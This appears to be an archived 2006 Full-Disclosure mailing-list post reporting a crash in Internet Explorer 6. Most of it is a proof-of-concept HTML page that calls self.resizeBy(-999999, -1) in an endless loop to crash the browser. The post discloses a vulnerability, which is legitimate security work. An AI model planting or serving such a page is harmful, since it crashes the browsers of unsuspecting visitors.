[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <f878e6870605260549v6ad5b7deu9dbfdd7d628f7e36@mail.gmail.com>
Date: Fri May 26 13:50:19 2006
From: kgp.143 at gmail.com (r k)
Subject: Internet Explorer Ver 6.0.2800.1106 vulnerability
Hi All,
IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.
the following is the code
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null);
while (wwidth)
{
self.resizeBy(-999999, -1);
}
</script>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
tested on windows 2000,windows XP
thank you
antar
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060526/d5c04073/attachment.html
Powered by blists - more mailing lists